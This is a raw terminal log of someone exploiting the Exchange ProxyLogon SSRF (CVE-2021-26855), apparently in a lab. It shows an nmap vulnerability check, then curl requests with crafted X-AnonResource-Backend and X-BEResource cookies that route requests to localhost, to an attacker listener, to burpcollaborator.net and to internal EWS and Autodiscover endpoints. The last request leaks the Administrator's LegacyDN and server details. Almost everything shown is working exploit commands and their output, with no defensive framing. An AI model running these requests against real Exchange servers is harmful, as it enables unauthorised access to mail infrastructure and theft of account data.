wvu@kharak:~/Downloads$ ls
http-vuln-cve2021-26855.nse
wvu@kharak:~/Downloads$ nmap -Pn -T4 -n -v -p 443 --open --script http-vuln-cve2021-26855 192.168.123.183
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 00:50 CST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:50
Completed NSE at 00:50, 0.00s elapsed
Initiating Connect Scan at 00:50
Scanning 192.168.123.183 [1 port]
Discovered open port 443/tcp on 192.168.123.183
Completed Connect Scan at 00:50, 0.00s elapsed (1 total ports)
NSE: Script scanning 192.168.123.183.
Initiating NSE at 00:50
Completed NSE at 00:50, 0.02s elapsed
Nmap scan report for 192.168.123.183
Host is up (0.00064s latency).

PORT    STATE SERVICE
443/tcp open  https
| http-vuln-cve2021-26855:
|   VULNERABLE:
|   Exchange Server SSRF Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2021-26855
|       Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010 are vulnerable to a SSRF via the X-AnonResource-Backend and X-BEResource cookies.
|
|     Disclosure date: 2021-03-02
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855
|_      http://aka.ms/exchangevulns

NSE: Script Post-scanning.
Initiating NSE at 00:50
Completed NSE at 00:50, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
wvu@kharak:~/Downloads$

wvu@kharak:~$ curl -kvb "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;" https://192.168.123.183/owa/auth/x.js
*   Trying 192.168.123.183...
* TCP_NODELAY set
* Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/cert.pem
  CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: CN=WIN-T4RO9496TA7
*  start date: Mar  8 22:45:17 2021 GMT
*  expire date: Mar  8 22:45:17 2026 GMT
*  issuer: CN=WIN-T4RO9496TA7
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7f8cb580b400)
> GET /owa/auth/x.js HTTP/2
> Host: 192.168.123.183
> User-Agent: curl/7.64.1
> Accept: */*
> Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!
< HTTP/2 500
< cache-control: private
< content-type: text/html; charset=utf-8
< server: Microsoft-IIS/10.0
< request-id: 864475e3-ee01-48a5-acf3-1b1cbbc50c02
< x-calculatedbetarget: localhost
< x-calculatedbetarget: localhost
< x-feserver: WIN-T4RO9496TA7
< x-aspnet-version: 4.0.30319
< x-powered-by: ASP.NET
< date: Tue, 09 Mar 2021 06:52:07 GMT
< content-length: 85
<
* Connection #0 to host 192.168.123.183 left intact
NegotiateSecurityContext failed with for host 'localhost' with status 'TargetUnknown'* Closing connection 0
wvu@kharak:~$

wvu@kharak:~$ curl -kvb "X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~$RANDOM" "https://192.168.123.183/owa/auth/$RANDOM.js"
*   Trying 192.168.123.183...
* TCP_NODELAY set
* Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/cert.pem
  CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: CN=WIN-T4RO9496TA7
*  start date: Mar  8 22:45:17 2021 GMT
*  expire date: Mar  8 22:45:17 2026 GMT
*  issuer: CN=WIN-T4RO9496TA7
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7f9ea080d600)
> GET /owa/auth/22702.js HTTP/2
> Host: 192.168.123.183
> User-Agent: curl/7.64.1
> Accept: */*
> Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!

wvu@kharak:~$ ncat -lkv --ssl 443
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: F55B E690 D8F2 84F1 EC64 816A 5763 2F5B B56F 0D72
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 192.168.123.183.
Ncat: Connection from 192.168.123.183:6303.
GET /owa/auth/22702.js HTTP/1.1
X-FE-ClientIP: 192.168.123.1
X-Forwarded-For: 192.168.123.1
X-Forwarded-Port: 55723
X-MS-EdgeIP:
X-ExCompId: ClientAccessFrontEnd
Accept: */*
User-Agent: curl/7.64.1
X-OriginalRequestHost: 192.168.123.183
X-OriginalRequestHostSchemePort: 443:https:192.168.123.183
X-MSExchangeActivityCtx: V=1.0.0.0;Id=26678ebf-2d0f-42bd-bac3-2d27889baed8;C=;P=
msExchProxyUri: https://192.168.123.183/owa/auth/22702.js
X-IsFromCafe: 1
X-SourceCafeServer: WIN-T4RO9496TA7.GIBSON.LOCAL
X-CommonAccessToken: VgEAVAlBbm9ueW1vdXNDAEUAAAAA
X-vDirObjectId: 621dccd3-6dff-49aa-87be-7911a110125e
Host: 192.168.123.1
Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563
Connection: Keep-Alive

wvu@kharak:~$ curl -kvb "X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~$RANDOM" "https://192.168.123.183/owa/auth/$RANDOM.js"
*   Trying 192.168.123.183...
* TCP_NODELAY set
* Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/cert.pem
  CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: CN=WIN-T4RO9496TA7
*  start date: Mar  8 22:45:17 2021 GMT
*  expire date: Mar  8 22:45:17 2026 GMT
*  issuer: CN=WIN-T4RO9496TA7
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7fd58480f600)
> GET /owa/auth/18409.js HTTP/2
> Host: 192.168.123.183
> User-Agent: curl/7.64.1
> Accept: */*
> Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~31368
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!
< HTTP/2 200
< cache-control: private
< content-type: text/html
< server: Microsoft-IIS/10.0
< request-id: 31688df5-982d-4d18-86d1-ae0e99c00ce8
< x-calculatedbetarget: burpcollaborator.net
< x-collaborator-version: 4
< x-aspnet-version: 4.0.30319
< x-powered-by: ASP.NET
< date: Tue, 09 Mar 2021 07:58:52 GMT
< content-length: 1190
<
<!DOCTYPE html>
<html>
<head>
 <meta charset="UTF-8">
</head>
<body>
<h1>Burp Collaborator Server</h1>
<p>Burp Collaborator is a service that is used by <a href="https://portswigger.net/burp/">Burp Suite</a> when testing web applications for security
vulnerabilities. Some of Burp Suite's tests may cause the application being
tested to interact with the Burp Collaborator server, to enable Burp Suite
to detect various security vulnerabilities.
</p><p>The Burp Collaborator server does not itself initiate any interactions with
any system, and only responds to interactions that it receives from other
systems.
</p><p>If you are a systems administrator and you are seeing interactions with the
Burp Collaborator server in your logs, then it is likely that someone is
testing your web application using Burp Suite. If you are trying to identify
the person responsible for this testing, you should review your web server
or applications logs for the time at which these interactions were initiated
by your systems.
</p><p>For further details about Burp Collaborator, please see the <a href="https://portswigger.net/burp/documentation/collaborator/">full documentation</a>.</p></body>
* Connection #0 to host 192.168.123.183 left intact
</html>* Closing connection 0
wvu@kharak:~$

wvu@kharak:~$ curl -kvb "X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~$RANDOM" "https://192.168.123.183/ecp/$RANDOM.js"
*   Trying 192.168.123.183...
* TCP_NODELAY set
* Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/cert.pem
  CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: CN=WIN-T4RO9496TA7
*  start date: Mar  8 22:45:17 2021 GMT
*  expire date: Mar  8 22:45:17 2026 GMT
*  issuer: CN=WIN-T4RO9496TA7
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7faac2808200)
> GET /ecp/1849.js HTTP/2
> Host: 192.168.123.183
> User-Agent: curl/7.64.1
> Accept: */*
> Cookie: X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~22406
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!
< HTTP/2 200
< cache-control: private
< content-type: text/html; charset=UTF-8
< server: Microsoft-IIS/10.0
< request-id: b4762a11-d418-43f8-a435-f04420289a4c
< x-calculatedbetarget: win-t4ro9496ta7
< x-calculatedbetarget: win-t4ro9496ta7.gibson.local
< x-diaginfo: WIN-T4RO9496TA7
< x-beserver: WIN-T4RO9496TA7
< x-feserver: WIN-T4RO9496TA7
< x-aspnet-version: 4.0.30319
< set-cookie: exchangecookie=ef4d50599057429b849b92e9059455af; expires=Wed, 09-Mar-2022 07:00:11 GMT; path=/; HttpOnly
< set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s/Gq8/Ixc7Pxc7O; expires=Tue, 09-Mar-2021 07:10:11 GMT; path=/EWS; secure; HttpOnly
< x-powered-by: ASP.NET
< x-feserver: WIN-T4RO9496TA7
< date: Tue, 09 Mar 2021 07:00:11 GMT
< content-length: 2836
<
<HTML lang="en"><HEAD><link rel="alternate" type="text/xml" href="https://win-t4ro9496ta7.gibson.local:444/EWS/Exchange.asmx?disco"/><STYLE type="text/css">#content{ FONT-SIZE: 0.7em; PADDING-BOTTOM: 2em; MARGIN-LEFT: 30px}BODY{MARGIN-TOP: 0px; MARGIN-LEFT: 0px; COLOR: #000000; FONT-FAMILY: Verdana; BACKGROUND-COLOR: white}P{MARGIN-TOP: 0px; MARGIN-BOTTOM: 12px; COLOR: #000000; FONT-FAMILY: Verdana}PRE{BORDER-RIGHT: #f0f0e0 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #f0f0e0 1px solid; MARGIN-TOP: -5px; PADDING-LEFT: 5px; FONT-SIZE: 1.2em; PADDING-BOTTOM: 5px; BORDER-LEFT: #f0f0e0 1px solid; PADDING-TOP: 5px; BORDER-BOTTOM: #f0f0e0 1px solid; FONT-FAMILY: Courier New; BACKGROUND-COLOR: #e5e5cc}.heading1{MARGIN-TOP: 0px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 26px; MARGIN-BOTTOM: 0px; PADDING-BOTTOM: 3px; MARGIN-LEFT: -30px; WIDTH: 100%; COLOR: #ffffff; PADDING-TOP: 10px; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #003366}.intro{display: block; font-size: 1em;}</STYLE><TITLE>Service</TITLE></HEAD><BODY><DIV id="content" role="main"><h1 class="heading1">Service</h1><BR/><P class="intro">You have created a service.<P class='intro'>To test this service, you will need to create a client and use it to call the service. You can do this using the svcutil.exe tool from the command line with the following syntax:</P> <BR/><PRE>svcutil.exe <A HREF="https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl">https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl</A></PRE></P><P class="intro">This will generate a configuration file and a code file that contains the client class. Add the two files to your client application and use the generated client class to call the Service. For example:<BR/></P><h2 class='intro'>C#</h2><br /><PRE><font color="blue">class </font><font color="black">Test
</font>{
<font color="blue">    static void </font>Main()
    {
        <font color="black">HelloClient</font> client = <font color="blue">new </font><font color="black">HelloClient</font>();

<font color="darkgreen">        // Use the 'client' variable to call operations on the service.

</font><font color="darkgreen">        // Always close the client.
</font>        client.Close();
    }
}
</PRE><BR/><h2 class='intro'>Visual Basic</h2><br /><PRE><font color="blue">Class </font><font color="black">Test
</font><font color="blue">    Shared Sub </font>Main()
<font color="blue">        Dim </font>client As <font color="black">HelloClient</font> = <font color="blue">New </font><font color="black">HelloClient</font>()
<font color="darkgreen">        ' Use the 'client' variable to call operations on the service.

</font><font color="darkgreen">        ' Always close the client.
</font>        client.Close()
<font color="blue">    End Sub
* Connection #0 to host 192.168.123.183 left intact
</font><font color="blue">End Class</font></PRE></DIV></BODY></HTML>* Closing connection 0
wvu@kharak:~$

wvu@kharak:~/Downloads$ cat poc.xml
<?xml version="1.0"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
  <Request>
    <EMailAddress>Administrator@gibson.local</EMailAddress>
    <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
  </Request>
</Autodiscover>
wvu@kharak:~/Downloads$ curl -kvb "X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~$RANDOM" -H "Content-Type: text/xml" "https://192.168.123.207/ecp/$RANDOM.js" -d @poc.xml
*   Trying 192.168.123.207...
* TCP_NODELAY set
* Connected to 192.168.123.207 (192.168.123.207) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/cert.pem
  CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: CN=WIN-T4RO9496TA7
*  start date: Mar  8 22:45:17 2021 GMT
*  expire date: Mar  8 22:45:17 2026 GMT
*  issuer: CN=WIN-T4RO9496TA7
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7fa592808200)
> POST /ecp/3425.js HTTP/2
> Host: 192.168.123.207
> User-Agent: curl/7.64.1
> Accept: */*
> Cookie: X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~24753
> Content-Type: text/xml
> Content-Length: 354
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 100)!
* We are completely uploaded and fine
< HTTP/2 200
< cache-control: private
< content-type: text/xml; charset=utf-8
< server: Microsoft-IIS/10.0
< request-id: bde5e90a-fe14-4b47-aaca-1a713d9832b1
< x-calculatedbetarget: win-t4ro9496ta7
< x-calculatedbetarget: win-t4ro9496ta7.gibson.local
< x-diaginfo: WIN-T4RO9496TA7
< x-beserver: WIN-T4RO9496TA7
< x-feserver: WIN-T4RO9496TA7
< x-aspnet-version: 4.0.30319
< set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s7Pq8/OxczJxc7G; expires=Wed, 10-Mar-2021 01:36:19 GMT; path=/autodiscover; secure; HttpOnly
< x-powered-by: ASP.NET
< x-feserver: WIN-T4RO9496TA7
< date: Wed, 10 Mar 2021 01:26:19 GMT
< content-length: 3866
<
<?xml version="1.0" encoding="utf-8"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006">
  <Response xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <User>
      <DisplayName>Administrator</DisplayName>
      <LegacyDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=94812d66d68146e8b6ac7b3312a93d7b-Admin</LegacyDN>
      <AutoDiscoverSMTPAddress>Administrator@gibson.local</AutoDiscoverSMTPAddress>
      <DeploymentId>eb64d327-1a67-4c9c-b64d-38d567e95480</DeploymentId>
    </User>
    <Account>
      <AccountType>email</AccountType>
      <Action>settings</Action>
      <MicrosoftOnline>False</MicrosoftOnline>
      <Protocol>
        <Type>EXCH</Type>
        <Server>47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</Server>
        <ServerDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</ServerDN>
        <ServerVersion>73C18880</ServerVersion>
        <MdbDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local/cn=Microsoft Private MDB</MdbDN>
        <PublicFolderServer>win-t4ro9496ta7.gibson.local</PublicFolderServer>
        <AD>WIN-T4RO9496TA7.gibson.local</AD>
        <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>
        <EwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EwsUrl>
        <EmwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EmwsUrl>
        <EcpUrl>https://win-t4ro9496ta7.gibson.local/owa/</EcpUrl>
        <EcpUrl-um>?path=/options/callanswering</EcpUrl-um>
        <EcpUrl-aggr>?path=/options/connectedaccounts</EcpUrl-aggr>
        <EcpUrl-mt>options/ecp/PersonalSettings/DeliveryReport.aspx?rfr=olk&exsvurl=1&IsOWA=<IsOWA>&MsgID=<MsgID>&Mbx=<Mbx>&realm=gibson.local</EcpUrl-mt>
        <EcpUrl-ret>?path=/options/retentionpolicies</EcpUrl-ret>
        <EcpUrl-sms>?path=/options/textmessaging</EcpUrl-sms>
        <EcpUrl-photo>?path=/options/myaccount/action/photo</EcpUrl-photo>
        <EcpUrl-tm>options/ecp/?rfr=olk&ftr=TeamMailbox&exsvurl=1&realm=gibson.local</EcpUrl-tm>
        <EcpUrl-tmCreating>options/ecp/?rfr=olk&ftr=TeamMailboxCreating&SPUrl=<SPUrl>&Title=<Title>&SPTMAppUrl=<SPTMAppUrl>&exsvurl=1&realm=gibson.local</EcpUrl-tmCreating>
        <EcpUrl-tmEditing>options/ecp/?rfr=olk&ftr=TeamMailboxEditing&Id=<Id>&exsvurl=1&realm=gibson.local</EcpUrl-tmEditing>
        <EcpUrl-extinstall>?path=/options/manageapps</EcpUrl-extinstall>
        <OOFUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</OOFUrl>
        <UMUrl>https://win-t4ro9496ta7.gibson.local/EWS/UM2007Legacy.asmx</UMUrl>
        <ServerExclusiveConnect>off</ServerExclusiveConnect>
      </Protocol>
      <Protocol>
        <Type>EXPR</Type>
        <Server>win-t4ro9496ta7.gibson.local</Server>
        <SSL>Off</SSL>
        <AuthPackage>Ntlm</AuthPackage>
        <ServerExclusiveConnect>on</ServerExclusiveConnect>
        <CertPrincipalName>None</CertPrincipalName>
        <GroupingInformation>Default-First-Site-Name</GroupingInformation>
      </Protocol>
      <Protocol>
        <Type>WEB</Type>
        <Internal>
          <OWAUrl AuthenticationMethod="Basic, Fba">https://win-t4ro9496ta7.gibson.local/owa/</OWAUrl>
          <Protocol>
            <Type>EXCH</Type>
            <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>
          </Protocol>
        </Internal>
      </Protocol>
    </Account>
  </Response>
* Connection #0 to host 192.168.123.207 left intact
</Autodiscover>* Closing connection 0
wvu@kharak:~/Downloads$